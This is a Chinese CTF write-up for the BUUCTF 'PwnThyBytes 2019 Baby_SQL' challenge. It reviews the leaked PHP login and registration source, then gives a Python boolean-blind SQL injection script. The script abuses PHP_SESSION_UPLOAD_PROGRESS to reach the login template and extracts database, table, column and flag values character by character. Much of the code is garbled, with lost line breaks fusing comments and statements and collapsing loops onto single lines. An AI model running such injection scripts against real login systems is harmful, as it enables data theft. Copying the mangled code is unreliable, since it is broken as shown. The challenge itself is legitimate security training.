当前位置: 首页 > news >正文

58,【8】BUUCTF [PwnThyBytes 2019]Baby_SQL1

4e37dd0f7ee3464aa6ce2393f6f95ef3.png

进入靶场

c4223c40e4334cd2a8820d5812d2e688.png

和2次注入的页面很像

不过养成查看源代码的好习惯

0f4a9d724c98460e8c313e3f1660dce6.png

af014ce10e9c45ce92c549ae8ca8926c.png

先访问source.zip

下载后解压,发现两个文件

b4edafca53194923bfa6ad2daa50e59e.png

第一个文件夹打开又有4个PHP文件

62033bcd258645bb9f2860e17d7ebaa9.png

那还是先看index.php文件好了

有PHP和HTML两部分,下面是PHP部分代码(HTML太长了,先放一放)

<?php
// 启动会话
session_start();// 对 $_SESSION 中的每个元素进行过滤处理
foreach ($_SESSION as $key => $value): $_SESSION[$key] = filter($value); endforeach;
// 对 $_GET 中的每个元素进行过滤处理
foreach ($_GET as $key => $value): $_GET[$key] = filter($value); endforeach;
// 对 $_POST 中的每个元素进行过滤处理
foreach ($_POST as $key => $value): $_POST[$key] = filter($value); endforeach;
// 对 $_REQUEST 中的每个元素进行过滤处理
foreach ($_REQUEST as $key => $value): $_REQUEST[$key] = filter($value); endforeach;// 定义过滤函数
function filter($value)
{// 如果值不是字符串,终止脚本并输出 Hacking attempt!!is_string($value) AND die("Hacking attempt!");// 使用 addslashes 函数对字符串进行转义,防止 SQL 注入return addslashes($value);
}// 如果满足以下条件,包含 templates/register.php 文件
isset($_GET['p']) AND $_GET['p'] === "register" AND $_SERVER['REQUEST_METHOD'] === 'POST' AND isset($_POST['username']) AND isset($_POST['password']) AND @include('templates/register.php');
// 如果满足以下条件,包含 templates/login.php 文件
isset($_GET['p']) AND $_GET['p'] === "login" AND $_SERVER['REQUEST_METHOD'] === 'GET' AND isset($_GET['username']) AND isset($_GET['password']) AND @include('templates/login.php');
// 如果满足以下条件,包含 templates/home.php 文件
isset($_GET['p']) AND $_GET['p'] === "home" AND @include('templates/home.php');
?>

对通过SESSION、GET、POST、REQUEST方法获取到的每个元素进行过滤处理,对字符串进行转义来防止SQL注入

看另外4个

db.php

<?php$servername = $_ENV["DB_HOST"];
$username = $_ENV["DB_USER"];
$password = $_ENV["DB_PASSWORD"];
$dbname = $_ENV["DB_NAME"];$con = new mysqli($servername, $username, $password, $dbname);?>
<?php
// 从环境变量中获取数据库的主机地址
$servername = $_ENV["DB_HOST"];
// 从环境变量中获取用于连接数据库的用户名
$username = $_ENV["DB_USER"];
// 从环境变量中获取连接数据库的密码
$password = $_ENV["DB_PASSWORD"];
// 从环境变量中获取要连接的数据库的名称
$dbname = $_ENV["DB_NAME"];// 使用 mysqli 类创建一个新的数据库连接对象,将前面获取的主机地址、用户名、密码和数据库名称作为参数
$con = new mysqli($servername, $username, $password, $dbname);
?>

home.php

<!DOCTYPE html>
<html lang="en">
<head><!-- 定义文档字符编码为 utf-8 --><meta charset="utf-8"><!-- 告知搜索引擎不要索引此页面 --><meta name="robots" content="noindex"><title>home</title><!-- 设置视口,以实现响应式布局 --><meta name="viewport" content="width=device-width, initial-scale=1"><!-- 引入 Bootstrap 的 CSS 样式表 --><link href="//netdna.bootstrapcdn.com/twitter-bootstrap/2.3.2/css/bootstrap-combined.min.css" rel="stylesheet"id="bootstrap-css"><style type="text/css"></style><!-- 引入 jQuery 库 --><script src="//code.jquery.com/jquery-1.10.2.min.js"></script><!-- 引入 Bootstrap 的 JavaScript 库 --><script src="//netdna.bootstrapcdn.com/twitter-bootstrap/2.3.2/js/bootstrap.min.js"></script>
</head>
<body>
<div class="container"><?php// 包含数据库连接文件 db.phpinclude 'db.php';// 判断是否设置了 $_SESSION["username"]if (isset($_SESSION["username"])):// 如果设置了 $_SESSION["username"],显示一个警告信息die('<div class="alert alert-warning" id="msg-verify" role="alert"><strong>Hope this site is secure! I did my best to protect against some attacks. New sections will be available soon.</strong></div>');else:// 如果未设置 $_SESSION["username"],进行页面刷新,跳转到?p=logindie('<meta http-equiv="refresh" content="0; url=?p=login" />');endif;?>
</div>
</body>
</html>

login.php

<?php!isset($_SESSION) AND die("Direct access on this script is not allowed!");
include 'db.php';$sql = 'SELECT `username`,`password` FROM `ptbctf`.`ptbctf` where `username`="' . $_GET['username'] . '" and password="' . md5($_GET['password']) . '";';
$result = $con->query($sql);function auth($user)
{$_SESSION['username'] = $user;return True;
}($result->num_rows > 0 AND $row = $result->fetch_assoc() AND $con->close() AND auth($row['username']) AND die('<meta http-equiv="refresh" content="0; url=?p=home" />')) OR ($con->close() AND die('Try again!'));?>
<?php
// 检查 $_SESSION 是否未被设置,如果未设置则终止脚本并输出错误信息,防止直接访问该脚本
!isset($_SESSION) AND die("Direct access on this script is not allowed!");
// 包含 db.php 文件,可能包含数据库连接等相关代码
include 'db.php';// 构建 SQL 查询语句,从 `ptbctf`.`ptbctf` 表中查询用户名为 $_GET['username'] 且密码为 $_GET['password'] 的 MD5 加密值的用户信息
$sql = 'SELECT `username`,`password` FROM `ptbctf`.`ptbctf` where `username`="'. $_GET['username']. '" and password="'. md5($_GET['password']). '";';
// 执行 SQL 查询
$result = $con->query($sql);// 定义 auth 函数,用于将用户信息存储在 $_SESSION 中并返回 True
function auth($user)
{$_SESSION['username'] = $user;return True;
}// 以下是逻辑判断:
// 如果查询结果行数大于 0,并且可以获取查询结果的一行数据,并且关闭数据库连接,并且调用 auth 函数存储用户信息,并且重定向到?p=home 页面,则执行成功;
// 否则关闭数据库连接并输出 Try again!
($result->num_rows > 0 AND $row = $result->fetch_assoc() AND $con->close() AND auth($row['username']) AND die('<meta http-equiv="refresh" content="0; url=?p=home" />')) OR ($con->close() AND die('Try again!'));
?>

redister.php

<?php!isset($_SESSION) AND die("Direct access on this script is not allowed!");
include 'db.php';(preg_match('/(a|d|m|i|n)/', strtolower($_POST['username'])) OR strlen($_POST['username']) < 6 OR strlen($_POST['username']) > 10 OR !ctype_alnum($_POST['username'])) AND $con->close() AND die("Not allowed!");$sql = 'INSERT INTO `ptbctf`.`ptbctf` (`username`, `password`) VALUES ("' . $_POST['username'] . '","' . md5($_POST['password']) . '")';
($con->query($sql) === TRUE AND $con->close() AND die("The user was created successfully!")) OR ($con->close() AND die("Error!"));?>
<?php
// 检查 $_SESSION 是否未被设置,如果未设置则终止脚本并输出错误信息,防止直接访问该脚本
!isset($_SESSION) AND die("Direct access on this script is not allowed!");
// 包含 db.php 文件,可能包含数据库连接等相关代码
include 'db.php';// 以下是对 $_POST['username'] 的验证:
// 检查用户名是否包含字母 a、d、m、i、n 中的任何一个(不区分大小写),
// 或者用户名长度小于 6,
// 或者用户名长度大于 10,
// 或者用户名不是字母数字组合
// 如果满足上述任何一个条件,则关闭数据库连接并输出 "Not allowed!"
(preg_match('/(a|d|m|i|n)/', strtolower($_POST['username'])) OR strlen($_POST['username']) < 6 OR strlen($_POST['username']) > 10 OR!ctype_alnum($_POST['username'])) AND $con->close() AND die("Not allowed!");// 构建 SQL 插入语句,将用户输入的用户名和密码(密码进行 MD5 加密)插入到 `ptbctf`.`ptbctf` 表中
$sql = 'INSERT INTO `ptbctf`.`ptbctf` (`username`, `password`) VALUES ("'. $_POST['username']. '","'. md5($_POST['password']). '")';
// 执行 SQL 插入操作,如果插入成功则关闭数据库连接并输出 "The user was created successfully!",否则关闭数据库连接并输出 "Error!"
($con->query($sql) === TRUE AND $con->close() AND die("The user was created successfully!")) OR ($con->close() AND die("Error!"));
?>

根据代码信息绕过过滤机制

运行以下python脚本

import requests
import timeurl = "http://b9b081b9-90ad-4343-93d0-98dbc62e66d2.node5.buuoj.cn:81/templates/login.php"files = {"file": "123456789"}# 字段值
flag = ''
for i in range(1, 100):low = 32high = 127mid = (low + high) // 2while low < high:time.sleep(0.06)payload_flag = {'username': f"test\" or (ascii(substr((select group_concat(secret) from flag_tbl ),{i},1))>{mid}) #",'password': 'test'}r = requests.post(url=url, params=payload_flag, files=files, data={"PHP_SESSION_UPLOAD_PROGRESS": "123456789"},cookies={"PHPSESSID": "test1"})if '<meta http-equiv="refresh" content="0; url=?p=home" />' in r.text:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32 or mid == 127:breakflag += chr(mid)print(flag)print(flag)# 列名
column = ''
for i in range(1, 100):low = 32high = 127mid = (low + high) // 2while low < high:time.sleep(0.06)payload_column = {'username': f"test\" or (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag_tbl' ),{i},1))>{mid}) #",'password': 'test'}r = requests.post(url=url, params=payload_column, files=files, data={"PHP_SESSION_UPLOAD_PROGRESS": "123456789"},cookies={"PHP_SESSION_UPLOAD_PROGRESS": "test1"})if '<meta http-equiv="refresh" content="0; url=?p=home" />' in r.text:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32 or mid == 127:breakcolumn += chr(mid)print(column)print(column)# 表名
table = ''
for i in range(1, 100):low = 32high = 127mid = (low + high) // 2while low < high:time.sleep(0.06)payload_table = {'username': f'test" or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ptbctf"),{i},1))>{mid}) #','password': 'test'}r = requests.post(url=url, params=payload_table, files=files, data={"PHP_SESSION_UPLOAD_PROGRESS": "123456789"},cookies={"PHP_SESSION_UPLOAD_PROGRESS": "test1"})if '<meta http-equiv="refresh" content="0; url=?p=home" />' in r.text:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32 or mid == 127:breaktable += chr(mid)print(table)print(table)# 数据库名
database = ''
for i in range(1, 100):low = 32high = 127mid = (low + high) // 2while low < high:time.sleep(0.06)payload_database = {'username': f"test\" or (ascii(substr((select database()),{i},1))>{mid}) #",'password': 'test'}r = requests.post(url=url, params=payload_database, files=files, data={"PHP_SESSION_UPLOAD_PROGRESS": "123456789"},cookies={"PHP_SESSION_UPLOAD_PROGRESS": "test1"})if '<meta http-equiv="refresh" content="0; url=?p=home" />' in r.text:low = mid + 1else:high = midmid = (low + high) // 2if mid == 32 or mid == 127:breakdatabase += chr(mid)print(database)

http://www.lryc.cn/news/522892.html

相关文章:

  • 2.1 三个世界”与“图灵测试”:人工智能与人类智能的深度探索
  • 基于微信小程序的优购电商系统设计与实现(LW+源码+讲解)
  • JS宏进阶: 工厂函数与构造函数
  • 【Linux】线程全解:概念、操作、互斥与同步机制、线程池实现
  • 关于ubuntu命令行连接github失败解决办法
  • # [游戏开发] [Unity游戏开发]3D滚球游戏设计与实现教程
  • 强推未发表!3D图!Transformer-LSTM+NSGAII工艺参数优化、工程设计优化!
  • Flutter中的事件冒泡处理
  • 昇腾环境ppstreuct部署问题记录
  • 基于 Python 的财经数据接口库:AKShare
  • 电力场景红外测温图像绝缘套管分割数据集labelme格式2436张1类别
  • 数字艺术类专业人才供需数据获取和分析研究
  • Java中json的一点理解
  • Vue项目搭建教程超详细
  • 2025年01月蓝桥杯Scratch1月stema选拔赛真题—美丽的图形
  • 【React】插槽渲染机制
  • 计算机网络 | 什么是公网、私网、NAT?
  • 如何解决Outlook无法连接到服务器的问题
  • vue2 web 多标签输入框 elinput是否当前焦点
  • 32单片机综合应用案例——物联网(IoT)环境监测站(四)(内附详细代码讲解!!!)
  • LabVIEW与WPS文件格式的兼容性
  • 小结: 路由协议的演进和分类
  • OpenCV相机标定与3D重建(60)用于立体校正的函数stereoRectify()的使用
  • Android wifi列表中去自身的热点
  • Windows环境本地配置pyspark环境详细教程
  • 《自动驾驶与机器人中的SLAM技术》ch9:自动驾驶车辆的离线地图构建
  • IP属地会随着人的移动而改变吗
  • openharmony应用开发快速入门
  • USB3020任意波形发生器4路16位同步模拟量输出卡1MS/s频率 阿尔泰科技
  • 云消息队列 Kafka 版 V3 系列荣获信通院“云原生技术创新标杆案例”